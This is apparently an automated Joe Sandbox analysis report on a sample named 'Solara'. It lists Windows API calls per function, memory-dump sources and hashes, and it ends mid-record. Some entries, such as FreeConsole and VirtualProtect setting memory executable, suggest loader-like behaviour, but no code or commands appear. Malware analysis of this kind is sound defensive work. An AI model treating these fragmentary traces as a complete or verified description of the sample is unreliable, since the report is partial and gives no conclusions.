                                                                                                                                      control_flow_graph 449 21da52-21da57 450 21da59-21da71 449->450 451 21da73-21da77 450->451 452 21da7f-21da88 450->452 451->452 453 21da79-21da7d 451->453 454 21da9a 452->454 455 21da8a-21da8d 452->455 456 21daf4-21daf8 453->456 459 21da9c-21daa9 GetStdHandle 454->459 457 21da96-21da98 455->457 458 21da8f-21da94 455->458 456->450 460 21dafe-21db01 456->460 457->459 458->459 461 21dad6-21dae8 459->461 462 21daab-21daad 459->462 461->456 464 21daea-21daed 461->464 462->461 463 21daaf-21dab8 GetFileType 462->463 463->461 465 21daba-21dac3 463->465 464->456 466 21dac5-21dac9 465->466 467 21dacb-21dace 465->467 466->456 467->456 468 21dad0-21dad4 467->468 468->456
                                                                                                                                      APIs
                                                                                                                                      • GetStdHandle.KERNEL32(000000F6,?,?,?,?,?,?,?,00000000,0021D941,00239330,0000000C), ref: 0021DA9E
                                                                                                                                      • GetFileType.KERNELBASE(00000000,?,?,?,?,?,?,?,00000000,0021D941,00239330,0000000C), ref: 0021DAB0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileHandleType
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                      • Opcode ID: 2d11aec3656576dc067552c68ce0f3644b52275ac1a55755928e938d2fb77ef1
                                                                                                                                      • Instruction ID: 47f4fdc7648a8c72bbcfa662d30b8e8bf03ef9b1e01532c5dd90fad7e8b01d90
                                                                                                                                      • Opcode Fuzzy Hash: 2d11aec3656576dc067552c68ce0f3644b52275ac1a55755928e938d2fb77ef1
                                                                                                                                      • Instruction Fuzzy Hash: 7C11B772128B43CAC730CE3E9C8C6667AD5AF76330B38075AD0B6865F1C6B1D8E6D200

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 00201240: _strlen.LIBCMT ref: 002012BA
                                                                                                                                      • FreeConsole.KERNELBASE(?,?,?,?,?,0020173F,?,?,?,00000000,?), ref: 00201F21
                                                                                                                                      • VirtualProtect.KERNELBASE(0023A011,00000549,00000040,?), ref: 00201F78
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ConsoleFreeProtectVirtual_strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1248733679-0
                                                                                                                                      • Opcode ID: 34529d41c0dada37e1c2587539075176342c62ab761974d4cd61904ed7eba277
                                                                                                                                      • Instruction ID: dbfc3ff8824c28746252edddaa8a6dce9c07a947f14ffd957923942f5be14a14
                                                                                                                                      • Opcode Fuzzy Hash: 34529d41c0dada37e1c2587539075176342c62ab761974d4cd61904ed7eba277
                                                                                                                                      • Instruction Fuzzy Hash: 5511C175A102146BDB04ABA4EC07FAE7778EB45701F504439FA04A72D3E67199714B91
                                                                                                                                      APIs
                                                                                                                                      • GetLastError.KERNEL32(00238E38,0000000C), ref: 00215483
                                                                                                                                      • ExitThread.KERNEL32 ref: 0021548A
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorExitLastThread
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1611280651-0
                                                                                                                                      • Opcode ID: 411e8221616531b33eba8aed73a4a64a341b11860cabc9d3e596bf41b4cc2cc1
                                                                                                                                      • Instruction ID: 154d16c6d1d9b4f12fae2617cf11749acde9fac9edf8a3e1c4a8079bd8f6568c
                                                                                                                                      • Opcode Fuzzy Hash: 411e8221616531b33eba8aed73a4a64a341b11860cabc9d3e596bf41b4cc2cc1
                                                                                                                                      • Instruction Fuzzy Hash: 0EF0A475660615AFDB10AF70D80EAAE7BB4FF50710F20849AF00597292DF7459A1CF91
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(00000000), ref: 00202288
                                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0020229C
                                                                                                                                        • Part of subcall function 00201FB0: CreateFileA.KERNELBASE ref: 00202036
                                                                                                                                        • Part of subcall function 00201FB0: GetFileSize.KERNEL32(00000000,00000000), ref: 00202046
                                                                                                                                        • Part of subcall function 00201FB0: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000), ref: 0020206B
                                                                                                                                        • Part of subcall function 00201FB0: CloseHandle.KERNELBASE(00000000), ref: 0020207A
                                                                                                                                        • Part of subcall function 00201FB0: _strlen.LIBCMT ref: 002020CD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: File$HandleModule$CloseCreateNameReadSize_strlen
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3505371420-0
                                                                                                                                      • Opcode ID: f21882c57a3bd28a0dce0ea0efbd54b207b79d6bf0615be2a8c69d2544cd3e4f
                                                                                                                                      • Instruction ID: 0a9a58c8b08b78e413c43e61ab3311437405269e2135b4db864c8b2dfa67a780
                                                                                                                                      • Opcode Fuzzy Hash: f21882c57a3bd28a0dce0ea0efbd54b207b79d6bf0615be2a8c69d2544cd3e4f
                                                                                                                                      • Instruction Fuzzy Hash: 94F0E5B191135027D6216B24BC4FEEB7BBCDF95710F004915F5894A182EA7415658A93
                                                                                                                                      APIs
                                                                                                                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,002202B4,?,00000000,?,?,0021FF54,?,00000007,?,?,0022089A,?,?), ref: 0021BEED
                                                                                                                                      • GetLastError.KERNEL32(?,?,002202B4,?,00000000,?,?,0021FF54,?,00000007,?,?,0022089A,?,?), ref: 0021BEF8
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorFreeHeapLast
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 485612231-0
                                                                                                                                      • Opcode ID: 1243fe4ecf9e9b65cfba49c65d7d2f7b4d7db47e1446234f1184847623458aa3
                                                                                                                                      • Instruction ID: 32902ceaf13bc6ca59608f0f8fddef2fec259045871d989e1cd612e7db391050
                                                                                                                                      • Opcode Fuzzy Hash: 1243fe4ecf9e9b65cfba49c65d7d2f7b4d7db47e1446234f1184847623458aa3
                                                                                                                                      • Instruction Fuzzy Hash: 26E08C32204254ABCB122FA4BC0CBD93BFDEB60391F108022F60896170CB3188A1CF94
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 06b77c12891fc6b374d63d8e5c23f2b4bdd9f81e1be126da4261a7cd6d7f4e80
                                                                                                                                      • Instruction ID: 3a88896efd4fcfd9ad164b50a7cea28a2085df19eb47ad1f1e65b595f774a694
                                                                                                                                      • Opcode Fuzzy Hash: 06b77c12891fc6b374d63d8e5c23f2b4bdd9f81e1be126da4261a7cd6d7f4e80
                                                                                                                                      • Instruction Fuzzy Hash: 7D418231A2021BAFCF14DFA8C4549EDB7B9FF18310F544069E442E7A81DB31E9A5DB50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: f819ac6451bc4ffbaa6d2828703778cea0c971bc0992546371654783be6716ca
                                                                                                                                      • Instruction ID: dbb5fb845519939fff793f95bb4f686b326bcad7a7e58a28c281ae4da98865b9
                                                                                                                                      • Opcode Fuzzy Hash: f819ac6451bc4ffbaa6d2828703778cea0c971bc0992546371654783be6716ca
                                                                                                                                      • Instruction Fuzzy Hash: 943197B192021AAFCB14CF68D8949EDB7B8BF09324B240366E515E36D1D731E964CB94
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0020AFC4: GetModuleHandleExW.KERNEL32(00000002,00000000,00208A2A,?,?,0020AF87,00208A2A,?,0020AF58,00208A2A,?,?,?), ref: 0020AFD0
                                                                                                                                      • FreeLibraryWhenCallbackReturns.KERNEL32(?,00000000,75E5C5C8,?,?,?,Function_0002BE94,000000FF), ref: 0020B0C7
                                                                                                                                        • Part of subcall function 0020AEFA: std::_Throw_Cpp_error.LIBCPMT ref: 0020AF1B
                                                                                                                                        • Part of subcall function 0020EFD2: ReleaseSRWLockExclusive.KERNEL32(00000000,?,?,00208E4A,0020A2F0), ref: 0020EFE7
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CallbackCpp_errorExclusiveFreeHandleLibraryLockModuleReleaseReturnsThrow_Whenstd::_
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3627539351-0
                                                                                                                                      • Opcode ID: 1c2e707d541f759b63e433cb093f3c6ac44e9848fab5c0ecccfd16a177018cf0
                                                                                                                                      • Instruction ID: 705761e94c1d93bf44f1fc322c3fc28e72c3d926ef69250ff6be891348ee01f6
                                                                                                                                      • Opcode Fuzzy Hash: 1c2e707d541f759b63e433cb093f3c6ac44e9848fab5c0ecccfd16a177018cf0
                                                                                                                                      • Instruction Fuzzy Hash: C011083361470267CB266F15EC19A2EB769EF41B20F10882AF81697AD2CB35D820CF41
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 4c74cb4ed663d7b3e89dd6d6136f7d022be89fc3fc4e89d8e23038d0f2ab46a5
                                                                                                                                      • Instruction ID: fb538a8343261ca3113e39c8a1124633a2be4e8f53cb12b582a8f69b75b7fe31
                                                                                                                                      • Opcode Fuzzy Hash: 4c74cb4ed663d7b3e89dd6d6136f7d022be89fc3fc4e89d8e23038d0f2ab46a5
                                                                                                                                      • Instruction Fuzzy Hash: 8C01F533224215AFDF168E68FC4599633EABBE8760B254025FA00C7094DB31DC62DF50
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalLeaveSection
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3988221542-0
                                                                                                                                      • Opcode ID: b97ffc56e9bd4726982bdb2ce5bbf98bef73d0746800807f8d0f46abaa2116c3
                                                                                                                                      • Instruction ID: ad8f91234ae361c7781cb21544ac2405cc0dfa5b1909aff821e67cdcba3eb6ae
                                                                                                                                      • Opcode Fuzzy Hash: b97ffc56e9bd4726982bdb2ce5bbf98bef73d0746800807f8d0f46abaa2116c3
                                                                                                                                      • Instruction Fuzzy Hash: 8A01FDF66283864BDB159B38E8652A8BB20FF96338B34426FD011845C3DB229874C600
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::details::_Release_chore.LIBCPMT ref: 002077C6
                                                                                                                                        • Part of subcall function 0020AF64: CloseThreadpoolWork.KERNEL32(?,00000000,?,002078DA,00000000), ref: 0020AF72
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CloseConcurrency::details::_Release_choreThreadpoolWork
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 312417170-0
                                                                                                                                      • Opcode ID: 9f2f21c670028022ae9e621f8078ff4ca87c3614b0b5f2bb692b7a8b6bf11a00
                                                                                                                                      • Instruction ID: e79958624ccca5798f822b1d6c05ffcb7588d202e22bf91d681eb2d70ad985cd
                                                                                                                                      • Opcode Fuzzy Hash: 9f2f21c670028022ae9e621f8078ff4ca87c3614b0b5f2bb692b7a8b6bf11a00
                                                                                                                                      • Instruction Fuzzy Hash: C7018BB1C003499BCB00EF84DC0979EBBB4FB04720F00423AE80967381E339AA51CBD2
                                                                                                                                      APIs
                                                                                                                                      • RtlAllocateHeap.NTDLL(00000000,0021DF35,?,?,0021DF35,00000220,?,00000000,?), ref: 0021BF43
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocateHeap
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1279760036-0
                                                                                                                                      • Opcode ID: 147946497931c3fe24cc1d378c123bac794a6023d732c97be25ce76082b1a5d0
                                                                                                                                      • Instruction ID: 5984882cc9db11e5298b951fa12cab81a89a0cad0fc6bf6f35fcaf4bf3565965
                                                                                                                                      • Opcode Fuzzy Hash: 147946497931c3fe24cc1d378c123bac794a6023d732c97be25ce76082b1a5d0
                                                                                                                                      • Instruction Fuzzy Hash: 9CE0E53153556266DA233E65AC08BDB36ECAF717A0F1501A0FC1C96990DB60DCE2CDA0
                                                                                                                                      APIs
                                                                                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 0020990F
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Concurrency::cancel_current_task
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 118556049-0
                                                                                                                                      • Opcode ID: 6e593c8e71e42ffcda6e1e51f57f8f7cc54918fe29f119af6c9c5b897f7fd9e0
                                                                                                                                      • Instruction ID: 047d5dd6611aa489480bf0276d5fb86854a696746914d28971b624e1913e0fec
                                                                                                                                      • Opcode Fuzzy Hash: 6e593c8e71e42ffcda6e1e51f57f8f7cc54918fe29f119af6c9c5b897f7fd9e0
                                                                                                                                      • Instruction Fuzzy Hash: F3D0A7397111244FC7257F28B81882E7365FFC872039604AAE941D7397C724EC528BC0
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • GetUserDefaultLCID.KERNEL32(-00000002,00000000,?,00000055,?), ref: 0022138F
                                                                                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 002213CD
                                                                                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 002213E0
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00221428
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00221443
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                                                                      • String ID: ,K#
                                                                                                                                      • API String ID: 415426439-2147254570
                                                                                                                                      • Opcode ID: fba8c70cef620072eb110d6d1ef962cc36d3fd7aaefe734522d41c0e985cfc83
